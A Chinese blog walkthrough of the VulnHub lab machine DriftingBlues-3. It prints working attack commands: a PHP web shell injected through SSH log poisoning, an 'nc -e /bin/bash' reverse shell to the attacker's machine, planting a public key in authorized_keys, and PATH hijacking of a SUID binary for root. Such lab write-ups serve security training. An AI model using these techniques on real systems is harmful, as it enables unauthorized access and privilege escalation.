vulnhub靶场渗透实战13-driftingblues3

最新推荐文章于 2024-05-20 16:00:12 发布
最新推荐文章于 2024-05-20 16:00:12 发布
阅读量648 收藏 1
点赞数 1
分类专栏: VulnHub靶场 文章标签: 服务器 ssh linux web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60329350/article/details/128217131
版权

靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues3.ova

vbox导入,网络模式桥接,靶机模式为简单。

一:信息收集

1;直接老样子吧,arp主机发现之后,nmap扫描端口服务。目录遍历。

 

 2;另请检查/littlequeenofspades.html

 源代码上发现一串密文。

echo aW50cnVkZXI/IEwyRmtiV2x1YzJacGVHbDBMbkJvY0E9PQ== | base64 -d

echo -n L2FkbWluc2ZpeGl0LnBocA== | base64 -d

 

 二;漏洞利用

1;ssh登录验证日志。前面说有毒,可能日志中毒。ssh auth log --> ssh身份验证日志,并且注意到登录用户名显示在日志中,也就是说如果我们使用ssh登陆时,将用户名写成一句话就可以写马进日志中。

ssh '<?php system($_GET["yang"]);?>'@192.168.1.40

 

 写入成功。

 那就反弹一下shell吧。反弹成功,没有权限,提升一下权限。

nc -e /bin/bash 192.168.1.28 1234

python -c 'import pty; pty.spawn("/bin/bash")' #交互shell

2;home目录下有个用户,想打开user.txt,但是没有权限,ssh文件可读可写可执行。

进到.ssh私钥,里面没有东西。有点奇怪,查看ssh配置文件/etc/ssh/sshd_config,发现可以使用公钥登入,并且给出了文件名/home/robertj/.ssh/authorized_keys

 ssh服务公钥登录,主要流程为:

  1. 客户端生成RSA公钥和私钥
  2. 客户端将自己的公钥存放到服务器
  3. 客户端请求连接服务器,服务器将一个随机字符串发送给客户端
  4. 客户端根据自己的私钥加密这个随机字符串之后再发送给服务器
  5. 服务器接受到加密后的字符串之后用公钥解密,如果正确就让客户端登录,否则拒绝。这样就不用使用密码了。

 在本地生成密钥对。

ssh-keygen 在本地生成.ssh目录

ssh-keygen -f yan  生成这样的文件

 在目标服务器的 .ssh 文件夹下创建存放客户端公钥的文件 authorized_keys(默认配置)

 把生成的公钥上传到靶机上去。

 把公钥信息写入目标文件

cat id_rsa.pub > authorized_keys

 ssh连接成功。注意一下这里,我在生成密钥对时,设置了一下密码,在生成密钥对时,可以不设置密码。

ssh 192.168.1.40 -l robertj -i id_rsa

 三:提权

1;第一个falg.

 2;命令劫持提权。

find / -perm -u=s -type f 2>/dev/null

 3;利用linpeas.sh脚本查找bug。

 大把的漏洞可执行。

 大概的原理就是 执行系统命令所以我们可以自行编写一个同名文件,
比如说cat,因为我们猜测getinfo中使用了cat命令,如若我们可以添加环境变量,getinfo在调用命令时首先检索环境变量就会调用到我们伪造的cat,执行我们想要的命令,来达到提权的效果,即使用环境变量进行命令劫持提权

export PATH=/tmp/:$PATH     把/tmp路径加入到系统路径中。
cd /tmp						
echo '/bin/bash' > ip		把/bin/bash写入到ip中。
chmod +x ip					增加执行权限
/usr/bin/getinfo

 4;第二个flag。

 

学安全的杨咩咩
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-3
Aluxian_的博客
06-15 1539
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址: https://www.vulnhub.com/entry/driftingblues-3,656/下载好了把安装包解压 然后试用VMware即可。 前言:这里又是DriftingBlues-2的问题 需要自己配网卡 具体参考:
vulnhub靶场渗透实战12-driftingblues2
随心所欲不逾矩
12-05 409
vbox导入,网络桥接。靶机下载地址:https://download.vulnhub.com/driftingblues/driftingblues2.ova 192.168.1.23 driftingblues.box 那就用wp-scan工具扫描一下有没有用户名或者可利用的插件。确定是albert是用户名。 可以直接复制粘贴到文件上去。 也可以开服务,卡莉下载私钥文件。 查找
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-6
Aluxian_的博客
03-20 1951
Vulnhub靶机driftingblues6_vh渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:开始目录爆破:③:暴力破解zip:③:上传WebShell:④:脏牛提权:⑤:获取flag:Vulnhub靶机渗透总结: Vulnhub靶机介绍: Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/ Vulnhub靶机漏洞详解: ①:信息收集: kali里使用net
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-1实战流程图
05-17
服务器数据恢复—KVM虚拟机被误删除怎么恢复数据?
beiya123的博客
05-17 182
9、针对存放程序代码的服务器中的节点和目录项丢失的情况,若节点或目录项有残留,可以尝试去补齐节点和目录项。如果文件的节点和目录项同时丢失,在这种情况下,根据节点和目录项之间相关联的特性则无法补齐节点和目录项。针对运行数据库的服务器中的数据库文件有丢失的情况,可以通过从自由空间中获取数据库页的方式去修补数据库文件。7、从自由空间中获取有效信息,尝试修补虚拟磁盘文件的节点,目录项以及虚拟磁盘文件中的数据库页等数据。4、完成索引的修复后解析服务器中残留的各级索引,从被误删除虚拟机所在的卷中提取虚拟磁盘文件。
【Xshell】Xshell 连接 Linux 服务器教程
我梦
05-20 416
【Xshell】Xshell 连接 Linux 服务器教程
Linux】-Linux文件的上传和下载、压缩和解压[9]
weixin_63106307的博客
05-16 548
Linux系统中,文件的上传和下载、压缩和解压是非常重要的操作。下面分别简述它们的重要性:文件的上传和下载:Linux系统是一个多用户的操作系统,多个用户可以同时访问同一台服务器。通过文件的上传和下载,用户可以方便地在本地计算机与远程服务器之间进行文件的传输。这对于用户来说非常重要,可以快速地备份和恢复文件,共享文件给其他用户,或者从远程服务器下载所需的文件。文件的压缩和解压:在Linux系统中,文件的压缩和解压是非常常见的操作。
电子阅览室在管理时需注意什么
最新发布
05-20 294
关于如今的绝大多数人来说,想必都听说过“”这一概念。它首要运用在校园中,给学生们供给愈加丰厚的常识储藏。它也是一个独立的局域网,在校园网络中作为重要的一个组成部分而存在。但是,一个好的电子阅览室是需求满意运用便利、安稳牢靠、出资合理等几大准则的,并且它会跟着信息时代的开展而不断进步。
win搭建Gitblit服务器
枫影竹韵的博客
05-17 1019
前言Gitblit 是一个开源纯 Java 的用于管理、查看和服务 Git 存储库。它是一个小型的托管集中式存储库工具。支持 SSH、HTTP 和 GIT 协议,开箱即用。Gitblit 融合了 GitHub、BitBucket 和 Gerrit 的元素,以提供基于主存储库中分支的简化协作工作流。管理员可以从 Web UI 创建和管理所有存储库、用户帐户和团队。步骤。
记录服务器iowait过高排查过程
嗨皮螃的博客
05-16 378
在维护服务器和站点的时候,突然被投诉说站点访问过慢。
Apache无法确定服务器的完全合格域名(FQDN)报错解决方法
par@ish的博客
05-17 285
在文件中找到全局配置区域(可能在文件的末尾或有注释指示的地方),添加或修改以下行来设置你的服务器的完全合格域名。完成上述步骤后,Apache在启动时就不会再显示那个警告信息了。这个配置有助于确保Apache正确识别其服务的域名,尤其是在处理基于域名的虚拟主机配置时尤为重要。,但具体的文件位置可能会根据你的Apache配置有所不同。要修复这个问题,你需要在Apache的主配置文件中手动设置。为你的服务器的实际完全合格域名或IP地址。)打开Apache的主配置文件。命令来查找相关的配置文件。
【Android】Android基于ibeacon信标实现蓝牙考勤功能,利用蓝牙信标做一款打卡软件,Android与服务器的蓝牙考勤系统
q742971636的博客
05-19 637
手机接收到这个信号后,根据ibeacon设备的UUID、major、minor和MAC这四个参数,就可以确认是哪一台ibeacon设备。然后,手机调用服务器上的考勤接口(注意:ibeacon设备只用于确认手机在考勤机附近,不会发送考勤数据到设备本身),这样就可以实现蓝牙考勤了。当手机的蓝牙开启并靠近ibeacon设备时,设备会主动发送蓝牙信号。
服务器数据恢复—服务器正常断电重启后raid信息丢失的数据恢复案例
beiya123的博客
05-20 160
服务器数据恢复环境: 一台某品牌DL380 G4服务器服务器通过该服务器品牌smart array控制器挂载了一台国产的磁盘阵列,磁盘阵列中有一组由14块SCSI硬盘组建的RAID5。服务器安装LINUX操作系统,搭建了NFS+FTP,作为内部文件服务器使用。 服务器故障: 搬迁机房后,工作人员将服务器和磁盘阵列打扫了一下,连接所有线缆后,将服务器和磁盘阵列开机,发现服务器无法识别RAID,提示未做初始化。
DDNS配置详解
衡水铁头哥的博客
05-15 905
正文共:1111 字 8 图,预估阅读时间:1 分钟前面配置了DDNS(拨号有公网IP地址了,肯定要通过DDNS用起来啊!),有不少小伙伴咨询具体的配置问题。为了方便大家深入理解DDNS的技术原理,我还特地去找了一下相关的RFC规范文档,有兴趣的小伙伴可以查看(动态主机配置协议(DHCP)客户端之间的完全限定域名(FQDN)冲突的解决方案)和(使用端口控制协议(PCP)更新动态DNS)。当然,这里...
vulnhub靶场通关
09-09
通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值